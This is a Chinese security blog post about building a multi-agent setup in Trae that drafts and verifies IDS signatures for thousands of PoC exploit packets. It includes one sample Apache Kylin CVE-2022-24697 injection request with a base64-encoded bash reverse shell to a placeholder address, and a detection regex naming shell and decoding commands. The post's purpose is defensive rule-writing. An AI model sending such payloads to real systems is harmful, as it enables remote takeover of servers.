<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="近来AI的热潮一波又一波，MCP，RAG，SKILL等各种专业词汇频繁出现在视野里，也看到了很多人在社交媒体发布一些利用AI提高工作效率的教程。作为传统守旧派，大多数时候我还是停留在使用网页问答版AI，因为更多的需求是有问题就问，或者让AI写个简单的脚本，没有大型的开发需求，像OpenClaw，cursor，claude这种火爆产品也只是停留在看看文章别人是怎么用的，没有上手调试过。 正好上周有个">
<meta property="og:type" content="article">
<meta property="og:title" content="智能体实践初体验">
<meta property="og:url" content="http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/index.html">
<meta property="og:site_name" content="Xsheep">
<meta property="og:description" content="近来AI的热潮一波又一波，MCP，RAG，SKILL等各种专业词汇频繁出现在视野里，也看到了很多人在社交媒体发布一些利用AI提高工作效率的教程。作为传统守旧派，大多数时候我还是停留在使用网页问答版AI，因为更多的需求是有问题就问，或者让AI写个简单的脚本，没有大型的开发需求，像OpenClaw，cursor，claude这种火爆产品也只是停留在看看文章别人是怎么用的，没有上手调试过。 正好上周有个">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/imgs/img/image-20260307210209581.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260307213941617.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260307214005741.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260307214522085.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260307214636457.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260307214621269.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260307215049883.png">
<meta property="og:image" content="http://example.com/imgs/img/%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_1772775100855.png">
<meta property="og:image" content="http://example.com/imgs/img/%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_17727751131317.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260307215959233.png">
<meta property="article:published_time" content="2026-03-07T15:40:51.399Z">
<meta property="article:modified_time" content="2026-03-07T15:43:02.181Z">
<meta property="article:author" content="Xsheep">
<meta property="article:tag" content="网络安全博客">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/imgs/img/image-20260307210209581.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>智能体实践初体验</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Xsheep" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/link/">link</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2026/01/05/%E8%87%AA%E5%BB%BA%E4%BB%A3%E7%90%86%E6%B1%A0/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&text=智能体实践初体验"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&is_video=false&description=智能体实践初体验"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=智能体实践初体验&body=Check out this article: http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&name=智能体实践初体验&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&t=智能体实践初体验"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E9%97%AE%E7%AD%94%E5%BC%8F"><span class="toc-number">1.</span> <span class="toc-text">0x01  问答式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E5%8D%8A%E8%87%AA%E5%8A%A8"><span class="toc-number">2.</span> <span class="toc-text">0x02 半自动</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%85%A8%E8%87%AA%E5%8A%A8"><span class="toc-number">3.</span> <span class="toc-text">0x03 全自动</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E6%99%BA%E8%83%BD%E4%BD%93"><span class="toc-number">3.1.</span> <span class="toc-text">创建智能体</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E5%86%8Cskill%E5%92%8CMCP"><span class="toc-number">3.2.</span> <span class="toc-text">注册skill和MCP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#solo-coder%E6%A8%A1%E5%BC%8F"><span class="toc-number">3.3.</span> <span class="toc-text">solo coder模式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%88%E6%9E%9C%E5%B1%95%E7%A4%BA"><span class="toc-number">3.4.</span> <span class="toc-text">效果展示</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-%E6%80%BB%E7%BB%93"><span class="toc-number"></span> <span class="toc-text">0x04 总结</span></a>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        智能体实践初体验
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Xsheep</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-03-07T15:40:51.399Z" class="dt-published" itemprop="datePublished">2026-03-07</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>近来AI的热潮一波又一波，MCP，RAG，SKILL等各种专业词汇频繁出现在视野里，也看到了很多人在社交媒体发布一些利用AI提高工作效率的教程。<br>作为传统守旧派，大多数时候我还是停留在使用网页问答版AI，因为更多的需求是有问题就问，或者让AI写个简单的脚本，没有大型的开发需求，像OpenClaw，cursor，claude这种火爆产品也只是停留在看看文章别人是怎么用的，没有上手调试过。</p>
<p>正好上周有个活，任务多，但是格式较为固定，步骤重复繁杂，人工来做相当耗费时间，并且效率极低，于是决定用用AI提高一下生产力。<br>这项任务的内容是要为4000个POC数据包编写检测规则。POC数据包类似于这种</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">POST /kylin/api/projects HTTP/1.1</span><br><span class="line">Host: &#123;&#123;Hostname&#125;&#125;</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: */*</span><br><span class="line">Connection: keep-alive</span><br><span class="line">Content-Type: application/json;charset=UTF-8</span><br><span class="line"></span><br><span class="line">&#123;&quot;projectDescData&quot;: &quot;&#123;\&quot;name\&quot;:\&quot;xxxxxx\&quot;,\&quot;description\&quot;:\&quot;\&quot;,\&quot;override_kylin_properties\&quot;:&#123;\&quot;kylin.engine.spark-conf.&#x27;`bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMC80NDQ0IDA+JjE=&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;`&#x27;\&quot;:\&quot;true\&quot;&#125;&#125;&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>需要编写规则格式如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">signature custom-rce-apache-kylin-cve-2022-24697 &#123;</span><br><span class="line">    ip-proto == tcp</span><br><span class="line">    http-request /.*kylin\/api\/projects.*/</span><br><span class="line">    payload /.*(bash\s+-c|`bash|cmd\.exe|system\(|exec\(|eval\(|base64,-d).*/</span><br><span class="line">    event &quot;[RCE] Apache Kylin 命令注入漏洞(CVE-2022-24697)&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>匹配规则很简单，主要分为两部分，一是漏洞利用路径，二是去匹配payload，两者都命中的话就告警。<br>如果数量少的话，人工去做还能接受，但是4000条数据包，肯定是要想点办法去提高一下效率的。<br>一开始想着用程序去自动化，其实不太好做，首先请求包分为GET和POST，有时payload出现在URI路径，有时出现在请求体里，有时还出现在UA头里，程序里只能写死，没办法很好去适配。但是AI能够理解自然语义，看起来是较优解。</p>
<h2 id="0x01-问答式"><a href="#0x01-问答式" class="headerlink" title="0x01  问答式"></a>0x01  问答式</h2><p>最初的想法就是利用网页AI，问答形式。开启一个新的对话，先在这个对话先输入提示词，然后接下来给它数据包，它来回复sig规则，拿到sig规则再去测试这条规则是否正确。流程如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">用户输入提示词 --》 用户输入数据包 --》 AI回复sig规则 --》 用户验证</span><br><span class="line">                      |                               |</span><br><span class="line">                      |                               |</span><br><span class="line">                      |-----&lt;---------&lt;-----&lt;---------|                               </span><br></pre></td></tr></table></figure>

<p>但是很快就发现了一个问题，它在思考回复内容的时候我是无事可做的，只能等，并且我需要频繁切换页面，需要给它输入POC数据包，需要粘贴出规则去验证。如果第一次它生成了一个错误的答案，还得让它重新思考，这套验证动作又得重新做一遍，感觉就很笨笨的，一直在重复没用的动作。</p>
<h2 id="0x02-半自动"><a href="#0x02-半自动" class="headerlink" title="0x02 半自动"></a>0x02 半自动</h2><p>这时候我希望能自动输入内容，然后让大模型一直生成规则，我只需要去粘贴输出去验证就行了。<br>于是写了个python脚本，这个脚本流程大概就是逐行读取本地POC数据包，发送给大模型的API接口，然后返回sig规则。这样就多线程了，脚本跑着，大模型一边生成，我一边验证，如果出现错误规则最后再统一处理。</p>
<p>为了让大模型能输出固定格式的规则，肯定是需要先给它一段提示词的。由于发现我用的那个API没法固定会话，也就是每次发送都是新开启一轮对话，所以初始的做法是把提示词编码在python脚本里，每次发送POC数据包的时候都带上这段提示词，让大模型知道我想要做的事情。交互了几次后发现，这个重复的动作也比较蠢，而且很消耗token，无法接受。开始找解决方法，如果是专业的agent工程师可能会很有经验的解决，但是作为刚入门agent的小白，没有想到如何通过优化整体架构来解决这个问题，最后是选择了阿里百炼平台搭建一个智能体。<br><img src="/imgs/img/image-20260307210209581.png" alt="image-20260307210209581"></p>
<p>平台上可以配置提示词，然后点击发布，发布后在python脚本里配置应用ID就可以使用了。可能消耗的token差不多，但是可以不用每次发送都带着提示词。</p>
<p>现在通过智能体和脚本就实现了半自动，我只需要粘贴python脚本的输出去验证就可以了。<br>流程如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">脚本读取POC数据包输入 ---》  智能体 --》输出sig规则 （线程1）</span><br><span class="line">用户粘贴sig规则  --》 验证 （线程2）</span><br></pre></td></tr></table></figure>

<h2 id="0x03-全自动"><a href="#0x03-全自动" class="headerlink" title="0x03 全自动"></a>0x03 全自动</h2><p>但是用着用着还是不太满足，实际上验证规则也是很重复的事情，就是把规则粘贴进去，执行check脚本，看日志中有无告警就行了，这件事我能否也交给AI去做完全解放人，实现全自动化呢？</p>
<p>想要实现全自动化有一个难点，要让智能体长出”手”。<br>也就是能够让它能够在我的服务器上执行验证这个动作。为了让智能体长出手，很自然而然的想到MCP协议，但是在这里我不太想用MCP，我想要不那么麻烦的去实现这个自动化场景，于其自己搭一个MCP服务器，还不如搭一个n8n​更顺手:kissing_heart:。</p>
<p>我的想法是想让智能体能调用脚本，用一个脚本去执行命令，一个脚本获取日志就行了。如果是这样的话就不能用阿里百炼这种平台化的智能体了，因为需要一个能够调用本地脚本的智能体，在我之前的了解中claude code和cursor都是能够做到这件事的，但是毕竟是国外的软件，要买账号，要挂代理，主要是为了验证一个demo很不值得，所以选择了国内的trae去平替。</p>
<p>安装完之后就是漫长的编写提示词以及调试脚本的过程，其实还挺费事，这里我们直接化简流程，只记录关键部分。</p>
<h3 id="创建智能体"><a href="#创建智能体" class="headerlink" title="创建智能体"></a>创建智能体</h3><p>一共是创建了两个智能体，分别用于 编写规则 和 验证规则</p>
<p><img src="/imgs/img/image-20260307213941617.png" alt="image-20260307213941617"></p>
<p>规则编写智能体的workflow是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">读取excel里的POC数据</span><br><span class="line">根据POC内容，输出sig规则</span><br><span class="line">将sig规则传输到远程服务器</span><br><span class="line">调用check脚本，校验语法和格式是否正确</span><br><span class="line">正确则写入excel，不正确则修改</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/img/image-20260307214005741.png" alt="image-20260307214005741"></p>
<p>校验智能体的workflow是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">传输excel里的规则到远程服务器</span><br><span class="line">调用check脚本</span><br><span class="line">获取日志，根据日志和excel里的poc数据，判断是否匹配成功</span><br><span class="line">如果不成功，调用debug脚本，获取debug日志</span><br><span class="line">根据debug日志修改规则，然后再次校验</span><br><span class="line">直至规则正确匹配</span><br></pre></td></tr></table></figure>

<h3 id="注册skill和MCP"><a href="#注册skill和MCP" class="headerlink" title="注册skill和MCP"></a>注册skill和MCP</h3><p>可以看到，两个智能体都需要读取写入本地excel文件和调用脚本以便能和远程服务器进行交互。<br>经过测试，没开启excel MCP的trae是读不太懂excel里的内容的，它为了读懂会自己写脚本然后在沙箱里运行，如果不想让大量一次使用的脚本污染项目文件夹的话，可以使用市场里已经配置好的excel MCP，直接添加启用就可以了。<br><img src="/imgs/img/image-20260307214522085.png" alt="image-20260307214522085"></p>
<p>此外，为了能让智能体知道什么场景该调用哪个脚本， 我注册了两个skill</p>
<p><img src="/imgs/img/image-20260307214636457.png" alt="image-20260307214636457"></p>
<p>一个是传输规则技能，调用传输脚本</p>
<p><img src="/imgs/img/image-20260307214621269.png" alt="image-20260307214621269"></p>
<p>一个是获取日志技能，传递不同参数获取不同日志</p>
<h3 id="solo-coder模式"><a href="#solo-coder模式" class="headerlink" title="solo coder模式"></a>solo coder模式</h3><p><img src="/imgs/img/image-20260307215049883.png" alt="image-20260307215049883"></p>
<p>trae有个solo coder模式，具备调用其它智能体的能力，这里我就让它当整个系统的大脑，负责规划拆解任务和调用其它智能体</p>
<h3 id="效果展示"><a href="#效果展示" class="headerlink" title="效果展示"></a>效果展示</h3><p><img src="/imgs/img/%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_1772775100855.png" alt="企业微信截图_1772775100855"></p>
<p>可以看到，solo coder会先给每个智能体分配任务，该编写的去编写，该校验的去校验<br>然后每个智能体开始干活</p>
<p><img src="/imgs/img/%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_17727751131317.png" alt="企业微信截图_17727751131317"></p>
<p>直到任务完成</p>
<p>现在 从生成 到 校验 到 修复 到 写入，只需一条指令，即可让这个Mult-Agent系统去全自动化完成。流程如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">用户输入指令 --》 solo coder拆解分配任务 --》 编写智能编写规则 --》 校验智能体校验，修复规则 --》 正确的规则写入 （线程1）</span><br><span class="line">人  --》 其它工作 (线程2)</span><br></pre></td></tr></table></figure>

<p>完全解放人类双手，输入完指令只需等任务完成即可，在这期间可以去干别的事。</p>
<p>当然，这里只是实现一个简单的demo，在我实际使用起来还是有很多问题<br>比如：</p>
<ol>
<li><p>每执行一步都需要思考几十秒，整套流程下来耗时反而比半自动耗时要长，需要去优化流程，减少这套系统的思考次数。</p>
</li>
<li><p>不听话，即使提示词已经再三强调格式问题，还是会出幻觉导致花费大幅文章不停重复的去处理格式问题而不是匹配内容，尤其是当某个会话出现一次被带入上下文后，甚至之后的回复都会出现这个问题，需要新开启一个会话才能解决。</p>
</li>
<li><p>还是会尝试自己去写脚本解决问题，一个任务完成后会发现文件夹里多出十几个脚本</p>
</li>
</ol>
<p><img src="/imgs/img/image-20260307215959233.png" alt="image-20260307215959233"></p>
<h1 id="0x04-总结"><a href="#0x04-总结" class="headerlink" title="0x04 总结"></a>0x04 总结</h1><p>通过trae搭建了一套Mult-Agent系统去全自动化编写检测规则。<br>其实对能跑通这个demo个人还是挺爽的，虽然效率不够，但是作为一个小玩具还是合格的，带来了很多思路。<br>并且只有切身去体验调试，才能知道在自己使用下，大模型的能力边界在哪里。比如可能这个模型就是很nb，但是在我的使用下，它就成为了一个总是记不住提示词的捣蛋鬼，也有可能是我的提示词写的有问题，也有可能是它就是不适合处理这个场景。为了弥补这个缺点，我的做法是会在模型输出之后，用代码的逻辑去限制一层，去校验一遍，以减少不确定性，确保每个输出节点都是能被下一个节点正确使用的格式。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/link/">link</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E9%97%AE%E7%AD%94%E5%BC%8F"><span class="toc-number">1.</span> <span class="toc-text">0x01  问答式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E5%8D%8A%E8%87%AA%E5%8A%A8"><span class="toc-number">2.</span> <span class="toc-text">0x02 半自动</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%85%A8%E8%87%AA%E5%8A%A8"><span class="toc-number">3.</span> <span class="toc-text">0x03 全自动</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E6%99%BA%E8%83%BD%E4%BD%93"><span class="toc-number">3.1.</span> <span class="toc-text">创建智能体</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E5%86%8Cskill%E5%92%8CMCP"><span class="toc-number">3.2.</span> <span class="toc-text">注册skill和MCP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#solo-coder%E6%A8%A1%E5%BC%8F"><span class="toc-number">3.3.</span> <span class="toc-text">solo coder模式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%88%E6%9E%9C%E5%B1%95%E7%A4%BA"><span class="toc-number">3.4.</span> <span class="toc-text">效果展示</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-%E6%80%BB%E7%BB%93"><span class="toc-number"></span> <span class="toc-text">0x04 总结</span></a>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&text=智能体实践初体验"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&is_video=false&description=智能体实践初体验"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=智能体实践初体验&body=Check out this article: http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&title=智能体实践初体验"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&name=智能体实践初体验&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/&t=智能体实践初体验"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

